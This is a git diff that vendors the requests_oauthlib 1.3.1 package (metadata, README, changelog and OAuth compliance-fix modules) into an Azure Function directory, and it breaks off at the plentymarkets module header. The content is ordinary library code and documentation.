+Classifier: Programming Language :: Python :: 2
+Classifier: Programming Language :: Python :: 2.7
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.4
+Classifier: Programming Language :: Python :: 3.5
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: Implementation :: CPython
+Classifier: Programming Language :: Python :: Implementation :: PyPy
+Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*
+Description-Content-Type: text/x-rst
+License-File: LICENSE
+Requires-Dist: oauthlib (>=3.0.0)
+Requires-Dist: requests (>=2.0.0)
+Provides-Extra: rsa
+Requires-Dist: oauthlib[signedtoken] (>=3.0.0) ; extra == 'rsa'
+
+Requests-OAuthlib |build-status| |coverage-status| |docs|
+=========================================================
+
+This project provides first-class OAuth library support for `Requests <https://requests.readthedocs.io>`_.
+
+The OAuth 1 workflow
+--------------------
+
+OAuth 1 can seem overly complicated and it sure has its quirks. Luckily,
+requests_oauthlib hides most of these and lets you focus on the task at hand.
+
+Accessing protected resources using requests_oauthlib is as simple as:
+
+.. code-block:: pycon
+
+    >>> from requests_oauthlib import OAuth1Session
+    >>> twitter = OAuth1Session('client_key',
+                                client_secret='client_secret',
+                                resource_owner_key='resource_owner_key',
+                                resource_owner_secret='resource_owner_secret')
+    >>> url = 'https://api.twitter.com/1/account/settings.json'
+    >>> r = twitter.get(url)
+
+Before accessing resources you will need to obtain a few credentials from your
+provider (e.g. Twitter) and authorization from the user for whom you wish to
+retrieve resources. You can read all about this in the full
+`OAuth 1 workflow guide on RTD <https://requests-oauthlib.readthedocs.io/en/latest/oauth1_workflow.html>`_.
+
+The OAuth 2 workflow
+--------------------
+
+OAuth 2 is generally simpler than OAuth 1 but comes in more flavours. The most
+common being the Authorization Code Grant, also known as the WebApplication
+flow.
+
+Fetching a protected resource after obtaining an access token can be extremely
+simple, for example (a sketch added here; ``client_id`` and ``token`` are
+placeholder values obtained beforehand):
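+
+.. code-block:: pycon
+
+    >>> from requests_oauthlib import OAuth2Session
+    >>> google = OAuth2Session(client_id, token=token)
+    >>> r = google.get('https://www.googleapis.com/oauth2/v1/userinfo')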
+
+However, before accessing resources you will need to obtain a few credentials
+from your provider (e.g. Google) and authorization from the user for whom you
+wish to retrieve resources. You can read all about this in the full
+`OAuth 2 workflow guide on RTD <https://requests-oauthlib.readthedocs.io/en/latest/oauth2_workflow.html>`_.
+
+Installation
+-------------
+
+To install requests and requests_oauthlib you can use pip:
+
+.. code-block:: bash
+
+    $ pip install requests requests_oauthlib
+
+.. |build-status| image:: https://github.com/requests/requests-oauthlib/actions/workflows/run-tests.yml/badge.svg
+   :target: https://github.com/requests/requests-oauthlib/actions
+.. |coverage-status| image:: https://img.shields.io/coveralls/requests/requests-oauthlib.svg
+   :target: https://coveralls.io/r/requests/requests-oauthlib
+.. |docs| image:: https://readthedocs.org/projects/requests-oauthlib/badge/
+   :alt: Documentation Status
+   :scale: 100%
+   :target: https://requests-oauthlib.readthedocs.io/
+
+
+History
+-------
+
+v1.3.1 (21 January 2022)
+++++++++++++++++++++++++
+
+- Add initial support for OAuth Mutual TLS (draft-ietf-oauth-mtls)
+- Add eBay compliance fix
+- Add Spotify OAuth 2 Tutorial
+- Add support for python 3.8, 3.9
+- Fixed LinkedIn Compliance Fixes
+- Fixed ReadTheDocs Documentation and sphinx errors
+- Moved pipeline to GitHub Actions
+
+v1.3.0 (6 November 2019)
+++++++++++++++++++++++++
+
+- Instagram compliance fix
+- Added ``force_querystring`` argument to fetch_token() method on OAuth2Session
+
+v1.2.0 (14 January 2019)
+++++++++++++++++++++++++
+
+- This project now depends on OAuthlib 3.0.0 and above. It does **not** support
+  versions of OAuthlib before 3.0.0.
+- Updated oauth2 tests to use 'sess' for an OAuth2Session instance instead of
+  `auth` because OAuth2Session objects and methods accept an `auth` parameter
+  which is typically an instance of `requests.auth.HTTPBasicAuth`
+- `OAuth2Session.fetch_token` previously tried to guess how and where to provide
+  "client" and "user" credentials incorrectly. This was incompatible with some
+  OAuth servers and incompatible with breaking changes in oauthlib that seek to
+  correctly provide the `client_id`. The older implementation also did not raise
+  the correct exceptions when username and password are not present on Legacy
+  clients.
+- Avoid automatic netrc authentication for OAuth2Session.
+
+v1.1.0 (9 January 2019)
++++++++++++++++++++++++
+
+- Adjusted version specifier for ``oauthlib`` dependency: this project is
+  not yet compatible with ``oauthlib`` 3.0.0.
+- Dropped dependency on ``nose``.
+- Minor changes to clean up the code and make it more readable/maintainable.
+
+v1.0.0 (4 June 2018)
+++++++++++++++++++++
+
+- **Removed support for Python 2.6 and Python 3.3.**
+  This project now supports Python 2.7, and Python 3.4 and above.
+- Added several examples to the documentation.
+- Added plentymarkets compliance fix.
+- Added a ``token`` property to OAuth1Session, to match the corresponding
+  ``token`` property on OAuth2Session.
+
+v0.8.0 (14 February 2017)
++++++++++++++++++++++++++
+
+- Added Fitbit compliance fix.
+- Fixed an issue where newlines in the response body for the access token
+  request would cause errors when trying to extract the token.
+- Fixed an issue introduced in v0.7.0 where users passing ``auth`` to several
+  methods would encounter conflicts with the ``client_id`` and
+  ``client_secret``-derived auth. The user-supplied ``auth`` argument is now
+  used in preference to those options.
+ +v0.7.0 (22 September 2016) +++++++++++++++++++++++++++ + +- Allowed ``OAuth2Session.request`` to take the ``client_id`` and + ``client_secret`` parameters for the purposes of automatic token refresh, + which may need them. + +v0.6.2 (12 July 2016) ++++++++++++++++++++++ + +- Use ``client_id`` and ``client_secret`` for the Authorization header if + provided. +- Allow explicit bypass of the Authorization header by setting ``auth=False``. +- Pass through the ``proxies`` kwarg when refreshing tokens. +- Miscellaneous cleanups. + +v0.6.1 (19 February 2016) ++++++++++++++++++++++++++ + +- Fixed a bug when sending authorization in headers with no username and + password present. +- Make sure we clear the session token before obtaining a new one. +- Some improvements to the Slack compliance fix. +- Avoid timing problems around token refresh. +- Allow passing arbitrary arguments to requests when calling + ``fetch_request_token`` and ``fetch_access_token``. + +v0.6.0 (14 December 2015) ++++++++++++++++++++++++++ + +- Add compliance fix for Slack. +- Add compliance fix for Mailchimp. +- ``TokenRequestDenied`` exceptions now carry the entire response, not just the + status code. +- Pass through keyword arguments when refreshing tokens automatically. +- Send authorization in headers, not just body, to maximize compatibility. +- More getters/setters available for OAuth2 session client values. +- Allow sending custom headers when refreshing tokens, and set some defaults. + + +v0.5.0 (4 May 2015) ++++++++++++++++++++ +- Fix ``TypeError`` being raised instead of ``TokenMissing`` error. +- Raise requests exceptions on 4XX and 5XX responses in the OAuth2 flow. +- Avoid ``AttributeError`` when initializing the ``OAuth2Session`` class + without complete client information. + +v0.4.2 (16 October 2014) +++++++++++++++++++++++++ +- New ``authorized`` property on OAuth1Session and OAuth2Session, which allows + you to easily determine if the session is already authorized with OAuth tokens + or not. +- New ``TokenMissing`` and ``VerifierMissing`` exception classes for OAuth1Session: + this will make it easier to catch and identify these exceptions. + +v0.4.1 (6 June 2014) +++++++++++++++++++++ +- New install target ``[rsa]`` for people using OAuth1 RSA-SHA1 signature + method. +- Fixed bug in OAuth2 where supplied state param was not used in auth url. +- OAuth2 HTTPS checking can be disabled by setting environment variable + ``OAUTHLIB_INSECURE_TRANSPORT``. +- OAuth1 now re-authorize upon redirects. +- OAuth1 token fetching now raise a detailed error message when the + response body is incorrectly encoded or the request was denied. +- Added support for custom OAuth1 clients. +- OAuth2 compliance fix for Sina Weibo. +- Multiple fixes to facebook compliance fix. +- Compliance fixes now re-encode body properly as bytes in Python 3. +- Logging now properly done under ``requests_oauthlib`` namespace instead + of piggybacking on oauthlib namespace. +- Logging introduced for OAuth1 auth and session. + +v0.4.0 (29 September 2013) +++++++++++++++++++++++++++ +- OAuth1Session methods only return unicode strings. #55. +- Renamed requests_oauthlib.core to requests_oauthlib.oauth1_auth for consistency. #79. +- Added Facebook compliance fix and access_token_response hook to OAuth2Session. #63. +- Added LinkedIn compliance fix. +- Added refresh_token_response compliance hook, invoked before parsing the refresh token. +- Correctly limit compliance hooks to running only once! 
+- Content type guessing should only be done when no content type is given +- OAuth1 now updates r.headers instead of replacing it with non case insensitive dict +- Remove last use of Response.content (in OAuth1Session). #44. +- State param can now be supplied in OAuth2Session.authorize_url + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/RECORD new file mode 100644 index 0000000..c1b03fa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/RECORD @@ -0,0 +1,36 @@ +requests_oauthlib-1.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +requests_oauthlib-1.3.1.dist-info/LICENSE,sha256=rgGEavrYqCkf5qCJZvMBWvmo_2ddhLmB-Xk8Ei94dug,745 +requests_oauthlib-1.3.1.dist-info/METADATA,sha256=xlgyoPqiXskknzuvbDx1-CiMjbjCpJ2OkxM_uQgQ6lo,10105 +requests_oauthlib-1.3.1.dist-info/RECORD,, +requests_oauthlib-1.3.1.dist-info/WHEEL,sha256=z9j0xAa_JmUKMpmz72K0ZGALSM_n-wQVmGbleXx2VHg,110 +requests_oauthlib-1.3.1.dist-info/top_level.txt,sha256=vx1R42DWBO64h6iu8Gco0F01TVTPWXSRWBaV1GwVRTQ,18 +requests_oauthlib/__init__.py,sha256=j3FXxxzppgvMvHj2v9csJtfEXt5QWeUODk6TmKTtopE,529 +requests_oauthlib/__pycache__/__init__.cpython-39.pyc,, +requests_oauthlib/__pycache__/oauth1_auth.cpython-39.pyc,, +requests_oauthlib/__pycache__/oauth1_session.cpython-39.pyc,, +requests_oauthlib/__pycache__/oauth2_auth.cpython-39.pyc,, +requests_oauthlib/__pycache__/oauth2_session.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__init__.py,sha256=M0zZXYmddhdiVVtazEC23tmPYP4MDaeBabKh9FiAyGc,398 +requests_oauthlib/compliance_fixes/__pycache__/__init__.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/douban.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/ebay.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/facebook.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/fitbit.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/instagram.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/mailchimp.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/plentymarkets.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/slack.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/weibo.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/douban.py,sha256=Ilfc1jTjCD66rPFrPf97g2D8Gb-MjoNuXqSGmaBVAn0,472 +requests_oauthlib/compliance_fixes/ebay.py,sha256=bLaGRBG4Pkoac2V4gme1-3pbRYcxvfAGyPID7K6xIZ8,890 +requests_oauthlib/compliance_fixes/facebook.py,sha256=V6_2BQnyBKcwTWDRqDTbJQcJj4Rd_XMTAlDgGiFTQf4,1119 +requests_oauthlib/compliance_fixes/fitbit.py,sha256=rgA4MrYKHqeNOfCGL0pdG3kgum6rzh1QMvgIHL_EOAE,905 +requests_oauthlib/compliance_fixes/instagram.py,sha256=LO55o9VrmeegJOCzz2-QqMlneXS6YY_33ulA_-cG1pI,948 +requests_oauthlib/compliance_fixes/mailchimp.py,sha256=nTdyttxiTxdAzbC72XZb1_uV4ebVOUvQDpDbAmBTqvQ,757 +requests_oauthlib/compliance_fixes/plentymarkets.py,sha256=HnROrco-Z9EvGEjHw3fn-7UxxC8G2GKB8Yjda3es7Yw,796 +requests_oauthlib/compliance_fixes/slack.py,sha256=YDz9DQ3ukNgbyy1X4JIPAhTKKMwMf8R8THxnzhm79zE,1453 +requests_oauthlib/compliance_fixes/weibo.py,sha256=yMvmc2xGWsaxZZNT3XYdJhDuxXJ99N6rO0n3d2cP9MA,444 +requests_oauthlib/oauth1_auth.py,sha256=yq-3SxMvPa1Ux-dm_a2mC32TDKdGGT2XJJuu3d4QtRo,3737 
+requests_oauthlib/oauth1_session.py,sha256=JPThdYoaDbc-I6aH7-UZKvFZ6B1ySvBlUkMqa6TcLpE,17055 +requests_oauthlib/oauth2_auth.py,sha256=uYT7ueHDG9TYR73yIFCX8TbquOz44p21lQYPCVw4gn8,1548 +requests_oauthlib/oauth2_session.py,sha256=lIuu5PbiVYfSrEiJ38H4QWh0maKEqwVUc3sU6hXXXmE,21992 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/WHEEL new file mode 100644 index 0000000..5b8c32a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/top_level.txt new file mode 100644 index 0000000..f34c632 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/top_level.txt @@ -0,0 +1 @@ +requests_oauthlib diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__init__.py new file mode 100644 index 0000000..7bd5609 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__init__.py @@ -0,0 +1,19 @@ +import logging + +from .oauth1_auth import OAuth1 +from .oauth1_session import OAuth1Session +from .oauth2_auth import OAuth2 +from .oauth2_session import OAuth2Session, TokenUpdated + +__version__ = "1.3.1" + +import requests + +if requests.__version__ < "2.0.0": + msg = ( + "You are using requests version %s, which is older than " + "requests-oauthlib expects, please upgrade to 2.0.0 or later." 
+ ) + raise Warning(msg % requests.__version__) + +logging.getLogger("requests_oauthlib").addHandler(logging.NullHandler()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..48bb44a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_auth.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_auth.cpython-39.pyc new file mode 100644 index 0000000..fc952a5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_auth.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_session.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_session.cpython-39.pyc new file mode 100644 index 0000000..7cad404 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_session.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_auth.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_auth.cpython-39.pyc new file mode 100644 index 0000000..c8faaa9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_auth.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_session.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_session.cpython-39.pyc new file mode 100644 index 0000000..f10c17e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_session.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__init__.py new file mode 100644 index 0000000..2d4a5f7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__init__.py @@ -0,0 +1,10 @@ +from __future__ import absolute_import + +from .facebook import facebook_compliance_fix +from .fitbit import fitbit_compliance_fix +from .slack import slack_compliance_fix +from .instagram import instagram_compliance_fix +from .mailchimp import mailchimp_compliance_fix +from .weibo import weibo_compliance_fix +from .plentymarkets import plentymarkets_compliance_fix +from 
.ebay import ebay_compliance_fix diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..390c554 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/douban.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/douban.cpython-39.pyc new file mode 100644 index 0000000..5d81ae7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/douban.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/ebay.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/ebay.cpython-39.pyc new file mode 100644 index 0000000..e841844 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/ebay.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/facebook.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/facebook.cpython-39.pyc new file mode 100644 index 0000000..43bd932 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/facebook.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/fitbit.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/fitbit.cpython-39.pyc new file mode 100644 index 0000000..19de9e7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/fitbit.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/instagram.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/instagram.cpython-39.pyc new file mode 100644 index 0000000..e4b33d6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/instagram.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/mailchimp.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/mailchimp.cpython-39.pyc new file mode 100644 index 0000000..15741a2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/mailchimp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/plentymarkets.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/plentymarkets.cpython-39.pyc new file mode 100644 index 0000000..e7e572b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/plentymarkets.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/slack.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/slack.cpython-39.pyc new file mode 100644 index 0000000..2144ca7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/slack.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/weibo.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/weibo.cpython-39.pyc new file mode 100644 index 0000000..f5546ca Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/weibo.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/douban.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/douban.py new file mode 100644 index 0000000..06b2486 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/douban.py @@ -0,0 +1,17 @@ +import json + +from oauthlib.common import to_unicode + + +def douban_compliance_fix(session): + def fix_token_type(r): + token = json.loads(r.text) + token.setdefault("token_type", "Bearer") + fixed_token = json.dumps(token) + r._content = to_unicode(fixed_token).encode("utf-8") + return r + + session._client_default_token_placement = "query" + session.register_compliance_hook("access_token_response", fix_token_type) + + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/ebay.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/ebay.py new file mode 100644 index 0000000..b440b18 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/ebay.py @@ -0,0 +1,23 @@ +import json +from oauthlib.common import to_unicode + + +def ebay_compliance_fix(session): + def 
_compliance_fix(response): + token = json.loads(response.text) + + # eBay responds with non-compliant token types. + # https://developer.ebay.com/api-docs/static/oauth-client-credentials-grant.html + # https://developer.ebay.com/api-docs/static/oauth-auth-code-grant-request.html + # Modify these to be "Bearer". + if token.get("token_type") in ["Application Access Token", "User Access Token"]: + token["token_type"] = "Bearer" + fixed_token = json.dumps(token) + response._content = to_unicode(fixed_token).encode("utf-8") + + return response + + session.register_compliance_hook("access_token_response", _compliance_fix) + session.register_compliance_hook("refresh_token_response", _compliance_fix) + + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/facebook.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/facebook.py new file mode 100644 index 0000000..e195c62 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/facebook.py @@ -0,0 +1,33 @@ +from json import dumps + +try: + from urlparse import parse_qsl +except ImportError: + from urllib.parse import parse_qsl + +from oauthlib.common import to_unicode + + +def facebook_compliance_fix(session): + def _compliance_fix(r): + # if Facebook claims to be sending us json, let's trust them. + if "application/json" in r.headers.get("content-type", {}): + return r + + # Facebook returns a content-type of text/plain when sending their + # x-www-form-urlencoded responses, along with a 200. If not, let's + # assume we're getting JSON and bail on the fix. + if "text/plain" in r.headers.get("content-type", {}) and r.status_code == 200: + token = dict(parse_qsl(r.text, keep_blank_values=True)) + else: + return r + + expires = token.get("expires") + if expires is not None: + token["expires_in"] = expires + token["token_type"] = "Bearer" + r._content = to_unicode(dumps(token)).encode("UTF-8") + return r + + session.register_compliance_hook("access_token_response", _compliance_fix) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/fitbit.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/fitbit.py new file mode 100644 index 0000000..e22361b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/fitbit.py @@ -0,0 +1,25 @@ +""" +The Fitbit API breaks from the OAuth2 RFC standard by returning an "errors" +object list, rather than a single "error" string. This puts hooks in place so +that oauthlib can process an error in the results from access token and refresh +token responses. This is necessary to prevent getting the generic red herring +MissingTokenError. 
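+
+A hypothetical usage sketch (not upstream documentation): given an
+``OAuth2Session`` named ``session``, call ``fitbit_compliance_fix(session)``
+once before fetching or refreshing tokens, so that both response hooks
+below are registered.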
+""" + +from json import loads, dumps + +from oauthlib.common import to_unicode + + +def fitbit_compliance_fix(session): + def _missing_error(r): + token = loads(r.text) + if "errors" in token: + # Set the error to the first one we have + token["error"] = token["errors"][0]["errorType"] + r._content = to_unicode(dumps(token)).encode("UTF-8") + return r + + session.register_compliance_hook("access_token_response", _missing_error) + session.register_compliance_hook("refresh_token_response", _missing_error) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/instagram.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/instagram.py new file mode 100644 index 0000000..d973628 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/instagram.py @@ -0,0 +1,26 @@ +try: + from urlparse import urlparse, parse_qs +except ImportError: + from urllib.parse import urlparse, parse_qs + +from oauthlib.common import add_params_to_uri + + +def instagram_compliance_fix(session): + def _non_compliant_param_name(url, headers, data): + # If the user has already specified the token in the URL + # then there's nothing to do. + # If the specified token is different from ``session.access_token``, + # we assume the user intends to override the access token. + url_query = dict(parse_qs(urlparse(url).query)) + token = url_query.get("access_token") + if token: + # Nothing to do, just return. + return url, headers, data + + token = [("access_token", session.access_token)] + url = add_params_to_uri(url, token) + return url, headers, data + + session.register_compliance_hook("protected_request", _non_compliant_param_name) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/mailchimp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/mailchimp.py new file mode 100644 index 0000000..fc3c9f5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/mailchimp.py @@ -0,0 +1,23 @@ +import json + +from oauthlib.common import to_unicode + + +def mailchimp_compliance_fix(session): + def _null_scope(r): + token = json.loads(r.text) + if "scope" in token and token["scope"] is None: + token.pop("scope") + r._content = to_unicode(json.dumps(token)).encode("utf-8") + return r + + def _non_zero_expiration(r): + token = json.loads(r.text) + if "expires_in" in token and token["expires_in"] == 0: + token["expires_in"] = 3600 + r._content = to_unicode(json.dumps(token)).encode("utf-8") + return r + + session.register_compliance_hook("access_token_response", _null_scope) + session.register_compliance_hook("access_token_response", _non_zero_expiration) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/plentymarkets.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/plentymarkets.py new file mode 100644 index 0000000..f759ef4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/plentymarkets.py @@ -0,0 +1,29 @@ 
